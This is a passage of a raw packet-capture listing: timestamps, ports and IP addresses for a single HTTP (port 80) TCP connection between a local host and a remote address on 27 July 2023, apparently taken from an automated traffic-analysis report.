Jul 27, 2023 20:18:43.726677895 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726697922 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726711988 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726722956 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726725101 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:43.726742983 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726756096 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726769924 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726795912 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726818085 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726840019 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726854086 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726866961 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726881027 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726893902 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726907015 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726919889 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726921082 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:43.726938963 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726952076 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726972103 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.726993084 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.727014065 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.727034092 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.727055073 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.727076054 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.727097988 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.727241039 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:43.727629900 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.727653027 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.727673054 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.727699041 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.727767944 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:43.728117943 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.728138924 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.728218079 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:43.728837013 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.728863955 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.728951931 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:43.756756067 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.756792068 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.756819010 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.756839991 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.756860018 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.756886959 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.756942987 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:43.756985903 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:43.799604893 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.799639940 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.799660921 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.799679041 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:43.799812078 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.002522945 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.002569914 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.002604961 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.002636909 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.002650023 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.002672911 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.002702951 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.002708912 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.002763033 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.002768040 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.002794027 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.002825975 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.002857924 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.002891064 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.002904892 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.002923012 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.002926111 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.002958059 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.002979994 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.002990961 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003022909 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003055096 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003062963 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.003087997 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003110886 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.003119946 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003154039 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003185987 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003221035 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003252983 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003278017 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.003278971 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.003283978 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003304958 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.003317118 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003348112 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003380060 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003412962 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003442049 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.003442049 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.003447056 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003511906 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003542900 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003545046 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.003576040 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003607988 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003617048 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.003640890 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003674984 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003706932 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003706932 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.003737926 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003771067 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003789902 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.003789902 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.003802061 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003850937 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003882885 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003899097 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.003916025 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003931999 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.003948927 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.003982067 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004048109 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004064083 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.004091024 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004131079 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.004134893 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004177094 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004188061 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.004220009 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004285097 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004317045 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.004425049 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004471064 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004482031 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.004514933 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004556894 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004597902 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.004601002 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004647017 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004657030 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.004692078 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004734039 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004749060 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.004777908 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004821062 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004842997 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.004864931 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004909992 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004911900 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.004955053 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.004997969 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005013943 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.005042076 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005084991 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005124092 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.005129099 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005172014 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005184889 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.005215883 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005259037 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005301952 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005327940 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.005346060 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005366087 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.005388975 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005430937 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005450010 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.005479097 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005522013 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005563974 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005585909 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.005609989 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005635977 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.005657911 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005702019 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005726099 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.005745888 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005789042 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005795002 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.005830050 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005872965 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005913973 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.005914927 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005959034 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.005968094 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.006000996 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006042957 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006078959 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.006083965 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006127119 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006169081 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006184101 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.006211996 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006221056 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.006254911 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006297112 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006314039 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.006340981 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006382942 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006423950 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006438017 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.006468058 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006475925 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.006510019 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006551981 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006576061 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.006593943 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006638050 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006681919 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006694078 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.006724119 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006737947 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.006767035 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006808996 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006850958 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006865025 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.006894112 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006902933 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.006937027 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.006979942 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.007020950 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.007030010 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.007064104 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.007072926 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.007106066 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.007148027 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.007189035 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.007205009 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.007231951 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.007275105 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.007281065 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.007318020 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.007343054 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.007363081 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.007404089 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.007446051 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.007461071 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.007488012 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.007499933 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.007529974 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.007571936 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.007631063 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.007986069 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.032314062 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.032366991 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.032406092 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.032444000 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.032450914 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.032485008 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.032496929 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.032526970 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.032558918 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.032567978 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.032608986 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.032649994 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.032665968 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.032691956 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.032731056 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.032771111 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.032861948 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.075196028 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.075272083 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.075282097 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.075328112 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.075378895 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.075395107 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.075465918 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.075512886 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.075539112 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.075558901 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.075617075 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.075629950 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.116168976 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.190253019 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.283215046 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283255100 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283273935 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283323050 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283344030 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283365011 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283385038 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283404112 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283427000 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283436060 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.283447981 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283468962 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283492088 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283514023 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283550978 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.283586025 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283607006 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283620119 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.283627033 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283644915 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283667088 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283684969 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283711910 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283716917 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.283725977 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283740044 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283756018 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.283771038 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283786058 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283802986 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.283807993 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283842087 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283849001 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.283902884 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.283905983 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283927917 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283948898 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283968925 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.283973932 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.283989906 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284009933 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284017086 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.284030914 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284050941 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284058094 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.284071922 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284091949 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284096003 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.284111977 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284131050 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284142971 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.284152031 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284172058 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284176111 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.284192085 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284212112 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.284213066 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284250975 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284252882 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.284286022 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284307003 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284327030 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284343958 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:44.284363985 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:44.284369946 CEST	49681	80	192.168.2.4	175.119.10.231
